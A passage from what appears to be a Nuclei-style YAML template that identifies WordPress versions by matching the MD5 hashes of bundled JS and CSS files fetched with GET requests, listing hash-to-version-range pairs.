name: 4.1.1 - 4.1.17 - dsl: - - "(\"185bb6e6f980917f5b60c2364ed72891\" == md5(body))" - - type: dsl - name: 4.1.18 - 4.1.32 - dsl: - - "(\"eebd05514db4ad8b2f7c01614e40305c\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"0284b64cbc37e3ded9b11133d7bc5fa9\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.17 - dsl: - - "(\"2af7de921aa01a2401792027394b4b86\" == md5(body))" - - type: dsl - name: 4.0.18 - 4.0.32 - dsl: - - "(\"70e9460296f0015550202829a4875756\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.18 - dsl: - - "(\"66dcf489b86a9afa45d327f90f63e651\" == md5(body))" - - type: dsl - name: 3.9.19 - 3.9.33 - dsl: - - "(\"2b51b0bcb5aace306affe367f0e41984\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"d735782274ded5e119173b45cbe274f8\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.20 - dsl: - - "(\"f520723d5ccdcb8e2a5c5d66f40d0e47\" == md5(body))" - - type: dsl - name: 3.8.21 - 3.8.33 - dsl: - - "(\"bc89d78db3fba05de97e6a6453efb358\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.20 - dsl: - - "(\"fff5ffc0860ce7ad5f84f4c35034fe57\" == md5(body))" - - type: dsl - name: 3.7.21 - 3.7.33 - dsl: - - "(\"4ade3891406d9308253a53aecd864f2e\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"cf6adf41af1e679b9d888591256c9221\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"776140617bb3df0ecccdaf5a6d881fa3\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"ce346a18d9b0d9ea703f53973ea09b06\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.4 - dsl: - - "(\"0f62d3fad1802882f09617ec1c093f35\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"b865445e9cb37247e8067d3c321e4ad1\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"834739e5c30c856f39db861e3427285b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"2869deff881c09388d7ed6419df830ee\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4a48e911b20edfe9c2f9c52cd9ee6fe5\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"80cfa16bc560acb9cbb3bea665ee501e\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"e7c0d56ef5d72a49f8d4439d31ff4669\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"cfb2d77a0067caf581ef810107666496\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0e894f610b3f90d611f17eceba6f34eb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d401e7e4d7d0c47d14571dc98e47e171\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-views.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"baa261d498278715c636677425927576\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"9bbd1fa91e81ac80c6e1cd12783681a5\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"b44bc57736b0f9071a8d5b4e1a1c38c0\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"6fad095c6f295131844afbfb089956d3\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"656fe22a4d1f6c149b387467c0ebda3d\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.23 - dsl: - - "(\"973cb2c3a853f2291eed73febceba08c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"c2fbe6eff1344e4b42ac21bfeff6323c\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.19 - dsl: - - "(\"c0eda638d60a8c22407bac9866253eb0\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"999ad3a86de87c0c592571f5cee59fa9\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.20 - dsl: - - "(\"3a7456ca374af47b36df25b8db73a9b6\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"1cdc4006b43c0e6434817af8a031bcdb\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8c94db3246f7e7de1c2b745fdae79383\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"45d6ae5dec12114dbd9b60fb03c4b510\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"a632e610f46df19fcefa26e4e6e0eab3\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"4fbc3282ad968a7874a32e69b2b5f7a8\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"6a0e09e778c9d60192c03f0d862ad6ca\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"f977730e90672fc7ba27ba83d4e190fd\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"8f9b3fcd0c47b1ba4bf54a1ed2989dd6\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"cd99128430a7e77777d1a80a3010f819\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"03c002070b42e7b16c032fb666774c66\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"d6c1665cce65f57593f33c6e94db1c32\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.4 - dsl: - - "(\"608a9976d28d43953839ba010fe84e60\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"bd3abdf24209a6355e09603b811c866a\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"8a3ff68fbf1fc580d0429d07ee55caf6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8806dd8e94b70370229f76b85c035efd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"24d3a9cd7cfb8c3b95e08bfe61feeed7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"4754c375277eba67871fb5ba44881fba\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"d461e034658d9fd174aa60691a242a1e\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"d27686a16f56b3a120483f46de693218\" == md5(body))" - - type: dsl - name: 4.3.21 - 4.3.25 - dsl: - - "(\"2ae7bb0173079ede4956aebecee60039\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"7eeec89992790dcd6095019d8befdb5d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"0fd597b70db817207a401a77250cc1a9\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"98135834eef3a3a00ae7c6e99457110e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e1fe49b6b4e7308fd2eda9c49779c9d2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4863f6f7d44547fcfbe2fc609ef03637\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"34ad39cacba1f3dff07a862c378dc401\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-views.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ee966b410333d2346a3c39416a7fc3c4\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"72005ffa5742a50f41246d5917e6e295\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"b1414f1a1df9af09f7f4cf3b86e41967\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"e501be91f82cbda570582d00ce43c054\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7b6f5f8a908b5083766141dbb8f10751\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.23 - dsl: - - "(\"cfddc53d9255a751bfc5b0d3fd677c49\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"eea98800b824bcf0885b882020a92ae1\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.19 - dsl: - - "(\"6e56654cc6f63fbab2a38db06606b644\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"611a20dba38b0421dc1af45eeaac4acd\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.20 - dsl: - - "(\"7c56e29067eccb592238ea9e0650bed4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"8582d4a37ee89cbf90edc967c4af02b6\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"3c6df510503404b2ac5be6ddba836293\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"205636ab90b157901d261ffabf4480d6\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"bc83b1b178eb990c3eb122abe42f2674\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"3ad3ae90aca2f54e72b14fe7f0421ae9\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"4ac9627f33575a6afaf4144704daecc2\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"0b13139d53176ef58565bdaa8b8190d4\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"b2517aad471230737b19eca7939536c6\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"d505be245b85486a9f2baffd711ae655\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"f744caaf733436017d261ed10764b05c\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"38ff988c7537bbaaefdc12d1f55f26f7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"f088ac384e6c8faec370911468e89703\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.4 - dsl: - - "(\"45c3a5624225a7c168e9e697c546ef56\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"81d53dec5df1b4d291cacaff561a54c9\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"80b33095e5ba53fee0a8f993e1bffaf9\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"7db21b9f1e3f67da3217e7e8168283a0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"bd2dfc60cbf1637c94e4c0fc5883e104\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"e9a54610ecb282dbc20f643c7cf88826\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"794fdfb3cf964780644b034fce9fa3cc\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"495178701107d00bcbbe5e22a528f4a7\" == md5(body))" - - type: dsl - name: 4.3.21 - 4.3.25 - dsl: - - "(\"a096d02a1c5453efa2353f6ae84e0edc\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"622927b82f5f2da5640fd9951c427e6e\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"9a6044f6a95fba2ccc9677358bbe0636\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"5ffe2bff63264b4e5a2fa4a78d1f9ace\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"d2778f59ff5acf2a20714145e226a57e\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"5cb288283c7772f5ee256ed4fa268a27\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"6d1effc3f68c5237eb414e2bddf3f98b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"80feee694b2af663c10d9dba54277d36\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a4c607508a8d4a640f49a68259f82e7d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-editor.min.js" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"d34ff4ff27d7fa2ccc1d763a30fafacf\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"16f721058fc92cf7ea8370c26468afb2\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"5b66060e4feb58f2e0a202c192d6200d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"e6e27ef49195615b463c87a88ec2a344\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"0809e04dcb482d3d58d6ed4583a91317\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"d7d6cd35e4d2ec5d0d97d3dfd2b5907c\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"b90eaf940e8466e846c8093278fff7cc\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"9ea065431e81d79173a331e7cc39aaed\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"984146c92ba79d3cc6826eb4b74b13ce\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"6aa44bdd30f72a64c09407a77a56cbcd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4b523d8aab95c1b29b4a1f03da923379\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-editor.js" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"bf3671bb7d3cd57cf469504f4ed0984d\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"76e1095617e4010135c2d398d9d8c2be\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"39a0a9870ad473ff94d0aa5f3c8c6bf4\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"4ae65914d30d7a00379dabebc4bf0727\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"3d83c9e397d94fae5c21f7ed3963cd98\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"6455689843f1f7de02d6876bf7b5286b\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"5f702adabf856834b3af0298d2fce54c\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"57dbdd04ec66190ee4d652c7f288de34\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"2d98d7b0fa43454b2d8ca1abc0062857\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"6c9f44b6af605c96b277f60d69fb8e7b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1def645391a69a654a6ac415c639ac44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/media-views.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"c2dc6122ad5ada23efd6dbb63cf4c3d7\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"07103bd9815f3c477bbf3f8af86c85ce\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"2a1ab38629d6f10178a0d200e7edaad1\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b6ce54d1cb6e16133d28aa02dc38100e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a6e655b44b1372c35d563b7904296ff7\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ff33874b8a636d534226e66ff2bd87f2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1a18ff7798302a2acb623692d8d08fd9\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"bbdb5de2ffa1378d42a1e0c1e47704d6\" == md5(body))" - - type: dsl - name: 4.0.2 - 4.0.32 - dsl: - - "(\"d57104d16ab5d91ce66d05d88c1be33d\" == md5(body))" - - type: dsl - name: 4.0.1 - dsl: - - "(\"de3d0b7763542b94e4c86cf8c423013f\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"260dcaf7e6e2827dbca061b824b13dd0\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"a95f22c6fa0fb98706d8893661499efa\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"3e32684f6b23d052378e1199045e920b\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"592e1ebf1392317ac258a26eedabee05\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"da980f717b09961e77acea1f0832d779\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"cad366eb2eaf38f62aa97c073a4277a3\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"31c7fd5c7249914b37af335db01fb3a8\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"f85ffada1056f95bb4f1a7454c2a7a55\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"f884a49215e3b86f5b00b70357048349\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"6528f823f107c824a8f037d59747ee86\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"cd980ca68442d6c7958aa25a1602be22\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"4b4b0b4618bcc9b8f3627314d31c7858\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"5b158afe0b4df51c1046ffcf6fac142a\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"e091f05329e13e2443004079007c3b9a\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"d1f608c17b5120eeb7d99c90f769a38e\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"14b7e4860e20a6ad3bd8497601265757\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"68de126da7badcb321e311e942d81af9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2c1edf5b9efbdf9bddfe780f822368bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/media-views-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1320986de5f4c511d2d91d49594bb55e\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"75bcf36d04024586721bf54011740bb9\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"473143467093228d834df66130904558\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c36750a3abc2cb8458d5019eb51c7e1c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"283fbf3687b454b9af277c971112e1fe\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b809a39abbf9269fb8ca45854dee66e7\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"745b6b6ebb69c22bc42f9780fe6a9f49\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ed5f4318d41d867af5241b53202f52dd\" == md5(body))" - - type: dsl - name: 4.0.2 - 4.0.32 - dsl: - - "(\"14321055939c72056c29da4fac03ebf4\" == md5(body))" - - type: dsl - name: 4.0.1 - dsl: - - "(\"a119e12e638192f47f133c28c9c259c4\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"d1703dff57c8a79d200a3cd8671be1a3\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"00596a3f53c0ed5f0980487bec09e24b\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"ecf3c4b2f07fdae92ad2b7610afabe7f\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"40ecf9d68327bdeaeb7c50bf53483a4f\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"748955e10d038a00280de9ffe656f09d\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"7dff4cd1a1c6a83b48aa548a885d9368\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"d2d68944a09ea1e709f2f0167c9ed0d5\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"d88590682bee1fa2d8e8fd2098613e1e\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"43dba56c280798e030a3eb57d13d117d\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"cfa39e76d5951ec19fb374fcc68722a4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2731739447719c2c138c09d4effe827e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"6f46bbbba6d72269891ebf1db8e43d1f\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"c72ac701e7e8604deef6d6b554c77d41\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"fcb870e743c4db730c63c9d050b22dde\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"e7433c5d289d445bbfe8592e637916fc\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"ca85d793557e7f488c1f3a4efa5e312b\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"59e457e75b241e4d9332bf32b9376d9a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5ee99fab2abde70aa52780512dd604b5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"0e9401a708382afec03c638511dd6817\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/common.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"25d6aacf8fe73d5b07b4e82751479f05\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"6f2235eef66da7f38777c524a9c36205\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.4 - dsl: - - "(\"a4a413ce024e8152e0f8956011d325fa\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"adc2e2546deb48d1564f5392650d2a05\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"f963adf2a7fb1a7c1c4199e204fc0d20\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fa1a35d8d7342fbcfd255b456415e0c3\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"e4400cac6b36526d679230e8b9dd9f1d\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"f83bef152421e22d8f14f2fb344f3410\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"b9c9f646d31ae6d74e97bc6b4d4a5c0a\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"3be9a7101e7a7635833c7321cf2017e5\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"d3a3f5d88670f6fea04b6f523f67b528\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"d16dd6c3f76ad777188cc5708adda0c3\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"a915138d60305201313066d43c61a2f6\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"24e5c1257b59677997a60bf7035f16c5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1cd324e7b6c46227e0f302337e762bcd\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.33 - dsl: - - "(\"4f9383d80d7b2a9947e9de21451226f9\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"58f2b7e3399f78ca0ab6aaa0a826bafc\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"886b5ea55729f7016211cf324af5e897\" == md5(body))" - - type: dsl - name: 3.6.1 - dsl: - - "(\"b45d244b6669aef59434fc30265f01f9\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"bfe3d59f6e7d5045d07f9835827d1324\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4b224e92257f97279f786973002b496d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"febc435f5a360e41a7b2b6cb2368af70\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"565c5b71c17d0f75bdeea5361b44b599\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"617d7413ace49ebdbde150e781a0fc64\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b11a0315c72981b2196bbe2bdcf0f75d\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"7cf98465a10b9d8c17cb3ea03a485875\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"58d9399f392d2fed4fa0430a68d53258\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"c9bd46200ead1003ef035b256ba9152f\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"d882c62db3212caee8464d76f47eae4a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fd645ad5b0c96e6aa8bdc86c29bf998f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/editor.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"177b13403b4c1d6ea0025572ac1b0b12\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"e97b439d9f0c638e88d8a4cc21823025\" == md5(body))" - - type: dsl - name: 4.6.1 - 4.6.20 - dsl: - - "(\"2bb48c16cf49b06d70fea86fe99edfff\" == md5(body))" - - type: dsl - name: 4.6 - dsl: - - "(\"4016c604bcec8a6544c2c966cb8e6925\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"73eb43b774ec35091006e8d0d8b41eb1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"aa25a3e29dd3a6af01e4fb6f80db10be\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"624d68ea15072444280b4f4e4f4522ec\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"4a459a304909052c6cdf05393599790b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a87f03a14efd9b8531164dac272aa07c\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1cbc0ca7cf2f6a0991a4da7cad7bd9c0\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"b5f9c498a1098ebdfbc2fa321f8bdf40\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"9ed346f17ea5f8a7d4f30d96003de9b1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"3b4ec67bdb6e4f311418ac5b8c302005\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"17f5a58fc4d053bffb8cb79efbb603a0\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"c599b07c5f3d814e9d0adf6ae57885df\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"fc895acd6895683e3014a5f5e7d9cbed\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"aa297505c208b2b6860af82106d985ca\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"84a599e6afa0ba8b5a00af97787ac52d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"492999721e753fc439107d980fd6f1bb\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"7234119d4cfae6ce5b9ad7689bde2b27\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"861f75019aa280e0b92aa0f9c9b84eaf\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"2ec44853d924b9eb24ff3cde0986aaaf\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"049a4b5288c49f627f02b150bc28a8be\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8f9006245f6630fe4dd7c0768668ea6d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - 